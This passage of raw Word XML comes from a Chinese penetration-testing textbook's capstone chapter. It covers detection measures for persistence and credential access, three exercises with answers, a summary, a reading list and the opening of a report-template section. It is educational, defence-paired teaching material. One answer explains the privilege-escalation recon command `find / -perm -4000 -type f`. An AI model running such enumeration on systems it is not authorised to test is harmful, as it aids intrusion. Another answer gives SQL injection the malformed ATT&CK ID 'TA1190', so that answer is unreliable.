              </w:rPr>
              <w:t xml:space="preserve">移除不必要</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">SUID；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">NoNewPrivileges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">；MAC</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (SELinux/AppArmor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤九：持久化/凭证访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TA0003 Persistence / TA0006 Cred. Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">authorized_keys</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文件完整性监控；SIEM</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">关联告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">强制访问控制；定期审计账户与</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SSH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">密钥；应急响应流程（隔离+重装）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="399"/>
    <w:bookmarkStart w:id="400" w:name="capstone-实操习题"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.14 capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1（提取题，标①②）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路中，SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的哪个战术？在蓝队检测中，为什么参数化查询能从根本上杜绝</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术分类及第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入映射到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TA1190（Exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Public-Facing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application）。参数化查询通过将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句结构与数据参数分离，使数据库引擎能够区分代码与数据，用户输入永远不会被当作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码执行——这是从根本违反</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入“数据与指令不分离”假设的反制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2（提取题，标①+②）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令的作用是什么？此命令与哪一项</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权技术相关？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回顾第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令的参数含义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：该命令用于枚举系统中所有设置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位的可执行文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-perm -4000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">匹配权限位中包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID（4000）的文件。该行为对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1548.001（Setuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Setgid），是权限提升中利用配置错误的典型前期侦察步骤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3（迁移任务，标②）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在你自己搭建的一台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mr-Robot、DC-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）上，按照本节描述的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill-chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤，完成从端口扫描到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权的全流程。在每一步结束时，记录：①使用的命令及输出摘要；②在该靶机环境中遇到的与本节通用步骤不同的具体问题；③为该靶机补写一个简要的渗透测试报告（格式参考第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示（迁移思路）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：不同的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机可能在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破阶段用到的漏洞不同（有的侧重</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WordPress </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">插件漏洞，有的侧重</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI，有的需要密码爆破）。但整体链路结构（侦察→Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破→Shell→提权→后渗透）是不变的。你的任务是把本节的方法框架应用到一个新环境，并记录差异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="400"/>
    <w:bookmarkStart w:id="401" w:name="小结-26"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节是全书攻击技术的集大成实操：我们将第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4、5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的侦察、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9–11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的提权和第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的后渗透串联成一条完整的授权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kill-chain。链上的每一步都回指了前置章节的原理，并强制配对了来自卷五（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19–20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）的检测与防御措施。这条从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化的完整链路，不仅是一次渗透测试演练，更是对全书“攻防对称”教学底线的最终兑现——理解假设在哪里被违反，才知道防线该设在哪里。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="401"/>
    <w:bookmarkStart w:id="402" w:name="延伸阅读白名单-12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Georgia Weidman《Penetration Testing: A Hands-On Introduction to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking》——覆盖了从实验室搭建到完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill-chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的全流程实战。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OffSec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PEN-200（PWK）课程及配套实验室——结构化、高强度的授权渗透测试实战训练。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kim《The Hacker Playbook </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3》——面向红队（Red</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Team）的实战方法论，包含大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill-chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建立和后渗透阶段技巧。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s Handbook》2nd Edition——Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞发现与利用的权威指南。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架——所有攻击步骤的战术、技术和缓解措施的标准参考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bejtlich《The Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》——网络取证和入侵检测的蓝队实战指南，与本书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的检测视角高度互补。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》——所有网络层/传输层/系统层底层知识的最终来源。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="402"/>
    <w:bookmarkStart w:id="403" w:name="渗透报告范本全书与全馆路线回指小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透报告范本·全书与全馆路线回指·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节的立意为全书收束：上接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill‑chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操，将攻击全流程沉淀为可交付的渗透报告范本；同时回顾全书五卷如何围绕“攻防对称”螺旋递进，梳理从实验室方法论到完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill‑chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的知识脊柱，并完成与《从位到物联》全馆体系的接口闭环。读者在此将看到：一份结构化、可操作的渗透报告应包含哪些要素；全书各卷的核心承重点如何汇聚于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并服务于攻防对称；本书与馆藏其他卷如何在概念上复用而不重复；以及我们有意将哪些内容划出本书授权教学边界。最后用三句话重述全书核心原则，并给出白名单延伸阅读路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">渗透报告范本（执行摘要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RoE / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
